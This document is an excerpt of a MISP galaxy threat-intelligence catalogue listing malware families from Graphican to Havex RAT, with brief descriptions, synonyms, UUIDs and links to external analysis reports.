According to Symantec, Graphican is an evolution of the known APT15 backdoor Ketrican, which itself was based on a previous malware - BS2005 - also used by APT15. Graphican has the same basic functionality as Ketrican, with the difference between them being Graphican’s use of the Microsoft Graph API and OneDrive to obtain its command-and-control (C&C) infrastructure.
Internal MISP references
UUID ccaefb44-1cbb-4f91-bd2d-ea5735446d1d
which can be used as unique global reference for Graphican
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Graphiron
Downloader / information stealer used by UAC-0056, observed since at least October 2022.
Internal MISP references
UUID 968e330d-281e-4647-99fd-d9903aa6bbba
which can be used as unique global reference for Graphiron
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Graphite
Trellix describes Graphite as a malware using the Microsoft Graph API and OneDrive for C&C. It was found being deployed in-memory only and served as a downloader for Empire.
Internal MISP references
UUID 8ecc6605-eed1-416c-bc8b-0dc1147d3c2b
which can be used as unique global reference for Graphite
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.graphite - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf - webarchive
- https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html - webarchive
- https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Graphon
Internal MISP references
UUID 9ab9e88f-b365-4d58-af52-e9d19ab00348
which can be used as unique global reference for Graphon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GraphSteel
This malware was seen during the cyberattacks on Ukrainian state organizations. It is one of two backdoors written in Go that were used by and attributed to UAC-0056 (SaintBear, UNC2589, TA471).
Internal MISP references
UUID 64963521-0181-4220-935a-a6deefa871b2
which can be used as unique global reference for GraphSteel
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel - webarchive
- https://www.mandiant.com/resources/spear-phish-ukrainian-entities - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/ - webarchive
- https://www.secureworks.com/research/the-growing-threat-from-infostealers - webarchive
- https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/ - webarchive
- https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/ - webarchive
- https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya - webarchive
- https://businessinsights.bitdefender.com/deep-dive-into-the-elephant-framework-a-new-cyber-threat-in-ukraine - webarchive
- https://www.govinfosecurity.com/cyber-espionage-actor-deploying-malware-using-excel-a-18830 - webarchive
- https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/ - webarchive
- https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview - webarchive
- https://cert.gov.ua/article/38374 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Grateful POS
POS malware targets systems that run physical point-of-sale devices and operates by inspecting process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After a card is first swiped, the personal account number (PAN) and accompanying data sit unencrypted in the point-of-sale system’s memory while the system determines where to send it for authorization. Masquerading as the LogMeIn software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with a low detection ratio, according to some of the earliest detections displayed on VirusTotal. The first sample was uploaded in November 2017. Additionally, this malware appears to be related to the FrameworkPOS malware, which was linked to some of the high-profile merchant breaches in the past.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Grateful POS.
Known Synonyms |
---|
FrameworkPOS |
SCRAPMINT |
trinity |
Internal MISP references
UUID f82f8d2c-695e-461a-bd4f-a7dc58531063
which can be used as unique global reference for Grateful POS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-franklin - webarchive
- https://redcanary.com/blog/frameworkpos-and-the-adequate-persistent-threat/ - webarchive
- https://usa.visa.com/dam/VCOM/global/support-legal/documents/cybercrime-groups-targeting-fuel-dispenser-merchants.pdf - webarchive
- https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf - webarchive
- https://content.fireeye.com/m-trends/rpt-m-trends-2020 - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season - webarchive
- https://norfolkinfosec.com/pos-malware-used-at-fuel-pumps/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gratem
Internal MISP references
UUID 5de7bd7f-bbbc-4431-8fd2-a90d25f30fd8
which can be used as unique global reference for Gratem
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gravity RAT (Windows)
Internal MISP references
UUID 1de27925-f94c-462d-acb6-f75822e05ec4
which can be used as unique global reference for Gravity RAT (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.gravity_rat - webarchive
- https://blog.talosintelligence.com/cosmic-leopard/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/ - webarchive
- https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/ - webarchive
- https://securelist.com/gravityrat-the-spy-returns/99097/ - webarchive
- https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GREASE
Internal MISP references
UUID 4ed079e6-69bd-481b-b873-86ced9ded750
which can be used as unique global reference for GREASE
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.grease - webarchive
- https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-301a - webarchive
- https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GreenShaitan
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GreenShaitan.
Known Synonyms |
---|
eoehttp |
Internal MISP references
UUID 9d0ddcb9-b0da-436a-af73-d9307609bd17
which can be used as unique global reference for GreenShaitan
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GreenDispenser
Internal MISP references
UUID 88fda711-cd7f-44e3-b92e-65f1c726df98
which can be used as unique global reference for GreenDispenser
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GreetingGhoul
Internal MISP references
UUID b8763a6f-2711-454d-bbde-7408ebe932c1
which can be used as unique global reference for GreetingGhoul
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GreyEnergy
Internal MISP references
UUID 5a683d4f-31a1-423e-a136-d348910ca967
which can be used as unique global reference for GreyEnergy
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.grey_energy - webarchive
- https://securelist.com/greyenergys-overlap-with-zebrocy/89506/ - webarchive
- https://github.com/NozomiNetworks/greyenergy-unpacker - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf - webarchive
- https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-viking - webarchive
- https://www.eset.com/int/greyenergy-exposed/ - webarchive
- https://www.nozominetworks.com/2019/02/12/blog/greyenergy-malware-research-paper-maldoc-to-backdoor/ - webarchive
- https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/ - webarchive
- https://attack.mitre.org/groups/G0034 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GRILLMARK
This is a proxy-aware HTTP backdoor that is implemented as a service and uses the compromised system's proxy settings to access the internet. C&C traffic is base64 encoded and the files sent to the server are compressed with aPLib.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GRILLMARK.
Known Synonyms |
---|
Hellsing Backdoor |
Internal MISP references
UUID 60cc0c72-e903-4dda-967a-9da0e12d4ac5
which can be used as unique global reference for GRILLMARK
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GRIMAGENT
GRIMAGENT is a backdoor that can execute arbitrary commands, download files, create and delete scheduled tasks, and execute programs via scheduled tasks or via the ShellExecute API. The malware persists via a randomly named scheduled task and a registry Run key. The backdoor communicates with hard-coded C&C servers via HTTP requests, with portions of its network communications encrypted using both asymmetric and symmetric cryptography. GRIMAGENT was used during some Ryuk ransomware intrusions in 2020.
Internal MISP references
UUID 57460bae-84ad-402d-8949-9103c5917703
which can be used as unique global reference for GRIMAGENT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.grimagent - webarchive
- https://blog.group-ib.com/grimagent - webarchive
- https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets - webarchive
- https://twitter.com/bryceabdo/status/1352359414746009608 - webarchive
- https://gibnc.group-ib.com/s/Group-IB_GrimAgent_analysis#pdfviewer - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GrimPlant
This malware was seen during the cyberattacks on Ukrainian state organizations. It is one of two backdoors written in Go that were used in these attacks and attributed to UAC-0056 (SaintBear, UNC2589, TA471).
Internal MISP references
UUID 235cba54-256e-48a0-b5dc-5e1aa3247cde
which can be used as unique global reference for GrimPlant
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.grimplant - webarchive
- https://www.mandiant.com/resources/spear-phish-ukrainian-entities - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/ - webarchive
- https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/ - webarchive
- https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/ - webarchive
- https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya - webarchive
- https://businessinsights.bitdefender.com/deep-dive-into-the-elephant-framework-a-new-cyber-threat-in-ukraine - webarchive
- https://www.govinfosecurity.com/cyber-espionage-actor-deploying-malware-using-excel-a-18830 - webarchive
- https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/ - webarchive
- https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2022/04/new-uac-0056-activity-theres-a-go-elephant-in-the-room/ - webarchive
- https://cert.gov.ua/article/38374 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GROK
Internal MISP references
UUID 5ba66415-b482-44ff-8dfa-809329e0e074
which can be used as unique global reference for GROK
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GroundPeony
Internal MISP references
UUID 6f52913f-e287-4f7a-95ae-4e43ea29a044
which can be used as unique global reference for GroundPeony
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Growtopia
According to PCrisk, Growtopia (also known as CyberStealer) is an information stealer written in the C# programming language. It can obtain system information, steal information from various applications, and capture screenshots. Its developer claims to have created this software for educational purposes only. This stealer uses the name of a legitimate online game.
Internal MISP references
UUID 5fb7db86-a510-400c-b7d3-4197eef09755
which can be used as unique global reference for Growtopia
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GRUNT
Internal MISP references
UUID 884782cf-9fdc-4f3c-8fba-e878330d0ef5
which can be used as unique global reference for GRUNT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.grunt - webarchive
- https://twitter.com/ItsReallyNick/status/1208141697282117633 - webarchive
- https://www.telsy.com/download/5776/?uid=aca91e397e - webarchive
- https://jsac.jpcert.or.jp/archive/2024/pdf/JSAC2024_1_9_takeda_furukawa_en.pdf - webarchive
- https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f - webarchive
- https://ti.qianxin.com/blog/articles/Suspected-Russian-speaking-attackers-use-COVID19-vaccine-decoys-against-Middle-East/ - webarchive
- https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
gsecdump
Internal MISP references
UUID 8410d208-7450-407d-b56c-e5c1ced19632
which can be used as unique global reference for gsecdump
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GSpy
A malware family with a DGA.
Internal MISP references
UUID 4e466824-7081-4163-8d90-895492b55f23
which can be used as unique global reference for GSpy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GTPDOOR
According to haxrob, GTPDOOR is the name of Linux-based malware that is intended to be deployed on systems in telco networks adjacent to the GRX (GPRS eXchange Network), with the novel feature of communicating C2 traffic over GTP-C (GPRS Tunnelling Protocol - Control Plane) signalling messages. This allows the C2 traffic to blend in with normal traffic and to reuse already permitted ports that may be open and exposed to the GRX network.
Internal MISP references
UUID e06aef59-6133-4e37-9e00-6c05ce52506a
which can be used as unique global reference for GTPDOOR
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GUP Proxy Tool
Internal MISP references
UUID 83d1bf1b-6557-4c2e-aa00-53013be73067
which can be used as unique global reference for GUP Proxy Tool
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gwisin (Windows)
Ransomware.
Internal MISP references
UUID ef39478b-716a-4b98-b10e-36b8ca22060c
which can be used as unique global reference for Gwisin (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.gwisin - webarchive
- https://www.skshieldus.com/download/files/download.do?o_fname=%EA%B7%80%EC%8B%A0(Gwisin)%20%EB%9E%9C%EC%84%AC%EC%9B%A8%EC%96%B4%20%EA%B3%B5%EA%B2%A9%20%EC%A0%84%EB%9E%B5%20%EB%B6%84%EC%84%9D%20%EB%A6%AC%ED%8F%AC%ED%8A%B8.pdf&r_fname=20220824150111854.pdf - webarchive
- https://asec.ahnlab.com/en/41565/ - webarchive
- https://asec.ahnlab.com/en/37483 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
H1N1 Loader
Internal MISP references
UUID 0ecf5aca-05ef-47fb-b114-9f4177faace3
which can be used as unique global reference for H1N1 Loader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HabitsRAT (Windows)
Internal MISP references
UUID b39de9b2-7739-44f4-a03b-1fffa0c0df04
which can be used as unique global reference for HabitsRAT (Windows)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HackBrowserData
Browser information stealer, written in Go.
Internal MISP references
UUID a4c2b9c1-ede6-4d55-b27e-5b5d52b9c46c
which can be used as unique global reference for HackBrowserData
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hacksfase
Internal MISP references
UUID 2713a763-33fa-45ce-8552-7dd12b6b8ecc
which can be used as unique global reference for Hacksfase
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HackSpy
Py2Exe-based tool, as found on GitHub.
Internal MISP references
UUID 4b5914fd-25e4-4a20-b6f5-faf4b34f49e9
which can be used as unique global reference for HackSpy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hades
According to PCrisk, Hades Locker is an updated version of WildFire Locker ransomware that infiltrates systems and encrypts a variety of data types using AES encryption. Hades Locker appends the names of encrypted files with the ".~HL[5_random_characters] (first 5 characters of encryption password)" extension.
Internal MISP references
UUID ab9b4a89-c35b-42aa-bffb-98fccf7d318f
which can be used as unique global reference for Hades
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hades - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://www.accenture.com/us-en/blogs/security/ransomware-hades - webarchive
- https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf - webarchive
- https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/ - webarchive
- https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/ - webarchive
- https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions - webarchive
- https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure - webarchive
- https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/unknown-threat-group-using-hades-ransomware - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-winter - webarchive
- https://awakesecurity.com/blog/incident-response-hades-ransomware-gang-or-hafnium/ - webarchive
- https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox - webarchive
- https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/ - webarchive
- https://twitter.com/inversecos/status/1381477874046169089?s=20 - webarchive
- https://killingthebear.jorgetesta.tech/actors/evil-corp - webarchive
- https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hakbit
Hakbit ransomware is written in .NET. It uploads (some) of the files to be encrypted to an FTP server. The ransom note is embedded, in earlier versions as a plain string and later as a base64 string. In some versions, these strings are slightly obfuscated.
Contact is via an email address hosted on Protonmail. The original Hakbit used hakbit@; the more recent "KiraLock" variant uses kiraransom@ (among others, of course).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Hakbit.
Known Synonyms |
---|
Thanos Ransomware |
Internal MISP references
UUID 18617856-c6c4-45f8-995f-4916a1b45b05
which can be used as unique global reference for Hakbit
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hakbit - webarchive
- https://securityboulevard.com/2022/03/midas-ransomware-tracing-the-evolution-of-thanos-ransomware-variants/ - webarchive
- https://www.justice.gov/usao-edny/press-release/file/1505981/download - webarchive
- https://www.zscaler.com/blogs/security-research/midas-ransomware-tracing-evolution-thanos-ransomware-variants - webarchive
- https://securelist.com/cis-ransomware/104452/ - webarchive
- https://www.carbonblack.com/2020/06/15/tau-threat-analysis-relations-to-hakbit-ransomware/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2020-0610.pdf - webarchive
- https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland - webarchive
- https://blog.cyble.com/2021/06/05/prometheus-an-emerging-apt-group-using-thanos-ransomware-to-target-organizations/ - webarchive
- http://id-ransomware.blogspot.com/2019/11/hakbit-ransomware.html - webarchive
- https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/ - webarchive
- https://unit42.paloaltonetworks.com/prometheus-ransomware/ - webarchive
- https://www.carbonblack.com/2020/06/08/tau-threat-analysis-hakbit-ransomware/ - webarchive
- https://unit42.paloaltonetworks.com/thanos-ransomware/ - webarchive
- https://securityintelligence.com/posts/ransomware-encryption-goes-wrong/ - webarchive
- https://www.seqrite.com/blog/thanos-ransomware-evading-anti-ransomware-protection-with-riplace-tactic/ - webarchive
- https://www.sekoia.io/en/the-story-of-a-ransomware-builder-from-thanos-to-spook-and-beyond-part-1/ - webarchive
- https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4 - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HALFRIG
A stager used by APT29 to deploy CobaltStrike.
Internal MISP references
UUID c89b2d7b-82b7-4329-81d0-ed99be4fad96
which can be used as unique global reference for HALFRIG
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hamweq
Internal MISP references
UUID 454fc9f7-b328-451f-806c-68ff5bcd491e
which can be used as unique global reference for Hamweq
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq - webarchive
- https://www.youtube.com/watch?v=JPvcLLYR0tE - webarchive
- https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf - webarchive
- https://www.youtube.com/watch?v=FAFuSO9oAl0 - webarchive
- https://blag.nullteilerfrei.de/2020/05/31/string-obfuscation-in-the-hamweq-irc-bot/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hancitor
Hancitor (aka Chanitor) emerged in 2013 and spreads via social engineering techniques, mainly phishing mails that embed a malicious link or carry a weaponized Microsoft Office document containing a malicious macro.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Hancitor.
Known Synonyms |
---|
Chanitor |
Internal MISP references
UUID 4166ab63-24b0-4448-92ea-21c8deef978d
which can be used as unique global reference for Hancitor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor - webarchive
- https://isc.sans.edu/forums/diary/Hancitor+activity+resumes+after+a+hoilday+break/26980/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear - webarchive
- https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak - webarchive
- https://www.uperesia.com/hancitor-packer-demystified - webarchive
- https://www.malware-traffic-analysis.net/2021/09/29/index.html - webarchive
- https://isc.sans.edu/diary/rss/27618 - webarchive
- https://muha2xmad.github.io/unpacking/hancitor/ - webarchive
- https://www.vmray.com/cyber-security-blog/hancitor-multi-step-delivery-process-malware-analysis-spotlight/ - webarchive
- https://www.dodgethissecurity.com/2019/11/01/hancitor-evasive-new-waves-and-how-com-objects-can-use-cached-credentials-for-proxy-authentication/ - webarchive
- https://pid4.io/posts/how_to_write_a_hancitor_extractor/ - webarchive
- https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/ - webarchive
- https://blog.group-ib.com/prometheus-tds - webarchive
- https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon - webarchive
- https://blog.group-ib.com/hancitor-cuba-ransomware - webarchive
- https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/ - webarchive
- https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor - webarchive
- https://cyber-anubis.github.io/malware%20analysis/hancitor/ - webarchive
- https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html - webarchive
- https://blog.group-ib.com/switching-side-jobs - webarchive
- https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/ - webarchive
- https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader - webarchive
- https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/ - webarchive
- https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html - webarchive
- https://inquest.net/blog/2021/04/16/unearthing-hancitor-infrastructure - webarchive
- https://www.silentpush.com/blog/pivoting-finding-malware-domains-without-seeing-malicious-activity - webarchive
- https://unit42.paloaltonetworks.com/wireshark-tutorial-hancitor-followup-malware/ - webarchive
- https://medium.com/@crovax/extracting-hancitors-configuration-with-ghidra-7963900494b5 - webarchive
- https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/ - webarchive
- https://twitter.com/TheDFIRReport/status/1359669513520873473 - webarchive
- https://github.com/OALabs/Lab-Notes/blob/main/Hancitor/hancitor.ipynb - webarchive
- https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618 - webarchive
- https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/ - webarchive
- https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/ - webarchive
- https://malware-traffic-analysis.net/2021/09/29/index.html - webarchive
- https://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-analysing-the-main-loader/ - webarchive
- https://muha2xmad.github.io/malware-analysis/fullHancitor/ - webarchive
- https://elis531989.medium.com/dissecting-and-automating-hancitors-config-extraction-1a6ed85d99b8 - webarchive
- https://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-maldoc-analysis/ - webarchive
- https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hancitor-making-use-of-cookies-to-prevent-url-scraping - webarchive
- https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Handala
According to Intezer, this is a second stage loader written in Delphi.
Internal MISP references
UUID e65a79ca-9236-4ffa-867c-afe9a856f1d0
which can be used as unique global reference for Handala
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.handala - webarchive
- https://www.splunk.com/en_us/blog/security/handalas-wiper-threat-analysis-and-detections.html - webarchive
- https://intezer.com/blog/research/stealth-wiper-israeli-infrastructure/ - webarchive
- https://www.trellix.com/blogs/research/handalas-wiper-targets-israel/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HappyLocker (HiddenTear?)
Internal MISP references
UUID fa0ffc56-6d82-469e-b624-22882f194ce9
which can be used as unique global reference for HappyLocker (HiddenTear?)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HARDRAIN (Windows)
Internal MISP references
UUID e4948b4c-be46-44a4-81e6-3b1922448083
which can be used as unique global reference for HARDRAIN (Windows)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Harnig
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Harnig.
Known Synonyms |
---|
Piptea |
Internal MISP references
UUID 619b9665-dac2-47a8-bf7d-942809439c12
which can be used as unique global reference for Harnig
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Haron Ransomware
Internal MISP references
UUID 788c44c1-d1cd-4b17-8fa9-116d682c3661
which can be used as unique global reference for Haron Ransomware
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hatef
According to Intezer, this is a wiper.
Internal MISP references
UUID 2af38f0c-b1fb-4241-8ae8-f06ea7729ff1
which can be used as unique global reference for Hatef
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hatef - webarchive
- https://www.splunk.com/en_us/blog/security/handalas-wiper-threat-analysis-and-detections.html - webarchive
- https://intezer.com/blog/research/stealth-wiper-israeli-infrastructure/ - webarchive
- https://www.trellix.com/blogs/research/handalas-wiper-targets-israel/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HavanaCrypt
Internal MISP references
UUID d2f11e7f-4daf-42f0-8304-e59935991745
which can be used as unique global reference for HavanaCrypt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Havex RAT
Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as "Dragonfly" and "Energetic Bear". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.
